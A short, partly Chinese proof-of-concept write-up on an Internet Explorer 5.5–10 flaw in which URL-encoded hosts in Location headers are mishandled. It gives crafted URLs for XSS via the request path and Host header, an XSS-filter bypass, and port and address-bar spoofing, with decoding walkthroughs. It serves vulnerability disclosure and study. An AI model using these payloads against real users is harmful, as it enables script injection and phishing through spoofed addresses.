由于IE对URL编码问题处理不当带来的XSS的PoC

参考：
http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
https://web.archive.org/web/20131107024350/http://blackfan.ru/

Source

RequestURI: <%= request.getRequestURI() %>
Host: <%= request.getServerName() %>
Port: <%= request.getLocalPort() %>

PoC (all versions IE 5.5 - 10.0 are affected):

XSS via Request-Path + XSS filter bypass + URLencode bypass + Address Bar Spoofing

http://blackfan.ru:8080/x?r=http://blackfan.ru/<img/src='x'onerror=alert(1)>/%252e%252e/%252e%252e/ 

XSS via Host header + XSS filter bypass

http://blackfan.ru:8080/x?r=http://blackfan.ru%252F<img%252Fsrc='x'onerror=alert(1)>%252F.%252e%252F.%252e%252F%253F%2523 

Port Spoofing

http://blackfan.ru:8080/x?r=http://www.microsoft.com%253A11/ru-ru/default.aspx 

http://blackfan.ru:8080/x?r=http://www.oracle.com%253A31337%252Findex.html%253F 

Description

Incorrect handling of url-encoded host in Location-header

Example

Location-header:

http://%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D/test

Original Host

%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D

Decoding

www.microsoft.com

Overlaying with the original

www.microsoft.com+%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D =www.microsoft.com9%63%72%6F%73%6F%66%74%2E%63%6F%6D

注：www.microsoft.com和%77%77%77%2E%6D%6的长度是一样的。关于具体的叠加方法，参考这张图：

it appears that IE does some odd overlaying of the path in its URL-encoded and URL-decoded form.

➜  ~/GitProjects  python -c "print len('%77%77%77%2E%6D%6');print len('www.microsoft.com')"1717

Result

http://www.microsoft.com9crosoft.com/test

XSS via Host Example

Location: http://example.com%2F<xss>%2F%2E%2E%2F%3F%23

Decoding:

example.com/<xss>/../?#

Overlaying:

example.com/<xss>/../?#2E%2E%2F%3F%23

Result Request:

GET /<xss>/../?#2E%2E%2F%3F%23 HTTP/1.1Host: example.com/<xss>/../?#

Port Spoofing Example:

Location: http://example.com%3A80

Decoding:

example.com:80

Overlaying:

example.com:80+example.com%3A80=example.com:8080

Address Bar:

example.com:8080